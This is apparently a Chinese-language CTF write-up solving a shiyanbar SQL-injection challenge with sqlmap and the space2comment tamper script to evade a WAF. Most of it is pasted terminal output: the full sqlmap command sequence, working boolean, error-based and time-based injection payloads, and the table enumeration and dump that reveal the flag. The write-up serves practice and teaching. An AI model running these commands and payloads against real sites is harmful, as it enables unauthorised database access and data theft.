这里我们会用到tamper,是python写的，sqlmap一般自带，主要的作用是绕过WAF
空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等

流程和简单的sql注入之3是一样的，不过加了–tamper而已
就不截图了，以下是我从KALI的终端上复制的
这里用的level参数是执行测试的等级(1-5,默认为1) 
sqlmap默认测试所有的GET和POST参数,当–level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。

root@kali:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” –level 2 
         _
 _| | _ _  {1.0-dev-nongit-201608240a89}
|_ -| . | |     | .’| . |
||  |||||,|  _|
      ||           ||   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:16:47

[21:16:47] [INFO] loading tamper script ‘space2comment’
[21:16:47] [INFO] testing connection to the target URL
[21:16:47] [INFO] heuristics detected web page charset ‘GB2312’
[21:16:47] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[21:16:47] [INFO] testing if the target URL is stable
[21:16:48] [INFO] target URL is stable
[21:16:48] [INFO] testing if GET parameter ‘id’ is dynamic
[21:16:48] [INFO] confirming that GET parameter ‘id’ is dynamic
[21:16:48] [INFO] GET parameter ‘id’ is dynamic
[21:16:48] [INFO] heuristic (basic) test shows that GET parameter ‘id’ might be injectable (possible DBMS: ‘MySQL’)
[21:16:48] [INFO] heuristic (XSS) test shows that GET parameter ‘id’ might be vulnerable to XSS attacks
[21:16:48] [INFO] testing for SQL injection on GET parameter ‘id’
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (2) and risk (1) values? [Y/n] y
[21:16:54] [INFO] testing ‘AND boolean-based blind - WHERE or HAVING clause’
[21:16:54] [WARNING] reflective value(s) found and filtering out
[21:16:55] [INFO] GET parameter ‘id’ seems to be ‘AND boolean-based blind - WHERE or HAVING clause’ injectable 
[21:16:55] [INFO] testing ‘MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause’
[21:16:55] [INFO] GET parameter ‘id’ is ‘MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause’ injectable 
[21:16:55] [INFO] testing ‘MySQL inline queries’
[21:16:55] [INFO] testing ‘MySQL > 5.0.11 stacked queries (SELECT - comment)’
[21:16:55] [WARNING] time-based comparison requires larger statistical model, please wait……..
[21:16:55] [INFO] testing ‘MySQL > 5.0.11 stacked queries (SELECT)’
[21:16:55] [INFO] testing ‘MySQL > 5.0.11 stacked queries (comment)’
[21:16:55] [INFO] testing ‘MySQL > 5.0.11 stacked queries’
[21:16:55] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query - comment)’
[21:16:55] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query)’
[21:16:56] [INFO] testing ‘MySQL >= 5.0.12 AND time-based blind (SELECT)’
[21:17:06] [INFO] GET parameter ‘id’ seems to be ‘MySQL >= 5.0.12 AND time-based blind (SELECT)’ injectable 
[21:17:06] [INFO] testing ‘Generic UNION query (NULL) - 1 to 20 columns’
[21:17:06] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:17:07] [INFO] testing ‘Generic UNION query (NULL) - 22 to 40 columns’
[21:17:09] [INFO] testing ‘MySQL UNION query (NULL) - 1 to 20 columns’
[21:17:09] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:17:09] [INFO] target URL appears to have 1 column in query
[21:17:10] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. ‘–dbms=mysql’) 
[21:17:10] [INFO] testing ‘MySQL UNION query (random number) - 1 to 20 columns’
[21:17:10] [INFO] testing ‘MySQL UNION query (NULL) - 22 to 40 columns’
[21:17:12] [INFO] testing ‘MySQL UNION query (random number) - 22 to 40 columns’
[21:17:16] [INFO] testing ‘MySQL UNION query (NULL) - 42 to 60 columns’
[21:17:17] [INFO] testing ‘MySQL UNION query (random number) - 42 to 60 columns’
[21:17:19] [INFO] testing ‘MySQL UNION query (NULL) - 62 to 80 columns’
[21:17:21] [INFO] testing ‘MySQL UNION query (random number) - 62 to 80 columns’
[21:17:22] [INFO] testing ‘MySQL UNION query (NULL) - 82 to 100 columns’
[21:17:23] [INFO] testing ‘MySQL UNION query (random number) - 82 to 100 columns’
GET parameter ‘id’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

sqlmap identified the following injection point(s) with a total of 242 HTTP(s) requests:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1’ AND 5580=5580 AND ‘lyjP’=’lyjP

Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x71717a7871,(SELECT (ELT(4047=4047,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqNType: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (SELECT)

• 1
• 2
• 3
• 4
• 5
• 6

Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo

[21:18:02] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:18:02] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:18:02] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’

[*] shutting down at 21:18:02

root@kali:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” –current-db 
         _
 _| | _ _  {1.0-dev-nongit-201608240a89}
|_ -| . | |     | .’| . |
||  |||||,|  _|
      ||           ||   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:18:22

[21:18:22] [INFO] loading tamper script ‘space2comment’
[21:18:22] [INFO] resuming back-end DBMS ‘mysql’ 
[21:18:23] [INFO] testing connection to the target URL
[21:18:23] [INFO] heuristics detected web page charset ‘GB2312’
[21:18:23] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1’ AND 5580=5580 AND ‘lyjP’=’lyjP

Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x71717a7871,(SELECT (ELT(4047=4047,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqNType: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (SELECT)

• 1
• 2
• 3
• 4
• 5
• 6

Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo

[21:18:23] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:18:23] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:18:23] [INFO] fetching current database
[21:18:23] [INFO] retrieved: web1
current database:    ‘web1’
[21:18:23] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’

[*] shutting down at 21:18:23

root@kali:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” -D web10 –tables 
         _
 _| | _ _  {1.0-dev-nongit-201608240a89}
|_ -| . | |     | .’| . |
||  |||||,|  _|
      ||           ||   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:18:43

[21:18:43] [INFO] loading tamper script ‘space2comment’
[21:18:43] [INFO] resuming back-end DBMS ‘mysql’ 
[21:18:43] [INFO] testing connection to the target URL
[21:18:43] [INFO] heuristics detected web page charset ‘GB2312’
[21:18:43] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1’ AND 5580=5580 AND ‘lyjP’=’lyjP

Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x71717a7871,(SELECT (ELT(4047=4047,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqNType: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (SELECT)

• 1
• 2
• 3
• 4
• 5
• 6

Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo

[21:18:43] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:18:43] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:18:43] [INFO] fetching tables for database: ‘web10’
[21:18:43] [INFO] fetching number of tables for database ‘web10’
[21:18:43] [WARNING] running in a single-thread mode. Please consider usage of option ‘–threads’ for faster data retrieval
[21:18:43] [INFO] retrieved: 
[21:18:43] [WARNING] reflective value(s) found and filtering out
0
[21:18:53] [WARNING] database ‘web10’ appears to be empty
[21:18:53] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y
[21:19:00] [INFO] checking table existence using items from ‘/usr/share/sqlmap/txt/common-tables.txt’
[21:19:00] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 10
[21:19:03] [INFO] starting 10 threads
[21:20:37] [INFO] tried 2645/3312 items (80%)
[21:20:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)
[21:20:37] [WARNING] if the problem persists please try to lower the number of used threads (option ‘–threads’)

[21:21:09] [WARNING] no table(s) found
No tables found
[21:21:09] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’

[*] shutting down at 21:21:09

root@kali:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” -D web1 –tables 
         _
 _| | _ _  {1.0-dev-nongit-201608240a89}
|_ -| . | |     | .’| . |
||  |||||,|  _|
      ||           ||   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:21:47

[21:21:47] [INFO] loading tamper script ‘space2comment’
[21:21:48] [INFO] resuming back-end DBMS ‘mysql’ 
[21:21:48] [INFO] testing connection to the target URL
[21:21:48] [INFO] heuristics detected web page charset ‘GB2312’
[21:21:48] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1’ AND 5580=5580 AND ‘lyjP’=’lyjP

Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x71717a7871,(SELECT (ELT(4047=4047,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqNType: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (SELECT)

• 1
• 2
• 3
• 4
• 5
• 6

Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo

[21:21:48] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:21:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:21:48] [INFO] fetching tables for database: ‘web1’
[21:21:48] [INFO] the SQL query used returns 2 entries
[21:21:48] [INFO] retrieved: flag
[21:21:48] [INFO] retrieved: web_1
Database: web1
[2 tables]
+——-+
| flag  |
| web_1 |
+——-+

[21:21:48] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’

[*] shutting down at 21:21:48

root@kali:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” -D web1 -T flag –columns
         _
 _| | _ _  {1.0-dev-nongit-201608240a89}
|_ -| . | |     | .’| . |
||  |||||,|  _|
      ||           ||   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:22:17

[21:22:17] [INFO] loading tamper script ‘space2comment’
[21:22:17] [INFO] resuming back-end DBMS ‘mysql’ 
[21:22:17] [INFO] testing connection to the target URL
[21:22:17] [INFO] heuristics detected web page charset ‘GB2312’
[21:22:17] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1’ AND 5580=5580 AND ‘lyjP’=’lyjP

Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x71717a7871,(SELECT (ELT(4047=4047,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqNType: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (SELECT)

• 1
• 2
• 3
• 4
• 5
• 6

Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo

[21:22:17] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:22:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:22:17] [INFO] fetching columns for table ‘flag’ in database ‘web1’
[21:22:17] [INFO] the SQL query used returns 2 entries
[21:22:17] [INFO] retrieved: flag
[21:22:17] [INFO] retrieved: char(30)
[21:22:18] [INFO] retrieved: id
[21:22:18] [INFO] retrieved: int(4)
Database: web1
Table: flag
[2 columns]
+——–+———-+
| Column | Type     |
+——–+———-+
| flag   | char(30) |
| id     | int(4)   |
+——–+———-+

[21:22:18] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’

[*] shutting down at 21:22:18

root@kali:~# sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 –tamper “space2comment.py” -D web1 -T flag -C flag –dump
         _
 _| | _ _  {1.0-dev-nongit-201608240a89}
|_ -| . | |     | .’| . |
||  |||||,|  _|
      ||           ||   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:22:35

[21:22:35] [INFO] loading tamper script ‘space2comment’
[21:22:35] [INFO] resuming back-end DBMS ‘mysql’ 
[21:22:35] [INFO] testing connection to the target URL
[21:22:35] [INFO] heuristics detected web page charset ‘GB2312’
[21:22:35] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS

sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1’ AND 5580=5580 AND ‘lyjP’=’lyjP

Type: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: id=1' AND (SELECT 4047 FROM(SELECT COUNT(*),CONCAT(0x71717a7871,(SELECT (ELT(4047=4047,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZzqN'='ZzqNType: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (SELECT)

• 1
• 2
• 3
• 4
• 5
• 6

Payload: id=1’ AND (SELECT * FROM (SELECT(SLEEP(5)))RGQw) AND ‘ByYo’=’ByYo

[21:22:35] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:22:35] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.2.17
back-end DBMS: MySQL 5.0
[21:22:35] [INFO] fetching entries of column(s) ‘flag’ for table ‘flag’ in database ‘web1’
[21:22:35] [INFO] the SQL query used returns 1 entries
[21:22:35] [INFO] retrieved: flag{Y0u_@r3_5O_dAmn_90Od}
[21:22:35] [INFO] analyzing table dump for possible password hashes
Database: web1
Table: flag
[1 entry]
+—————————-+
| flag                       |
+—————————-+
| flag{Y0u_@r3_5O_dAmn_90Od} |
+—————————-+

[21:22:35] [INFO] table ‘web1.flag’ dumped to CSV file ‘/root/.sqlmap/output/ctf5.shiyanbar.com/dump/web1/flag.csv’
[21:22:35] [INFO] fetched data logged to text files under ‘/root/.sqlmap/output/ctf5.shiyanbar.com’

[*] shutting down at 21:22:35

最近读到两篇两篇不错的文章，可供参考：
1.http://www.freebuf.com/articles/web/10789.html
2.https://www.waitalone.cn/sqlmap-users-manual.html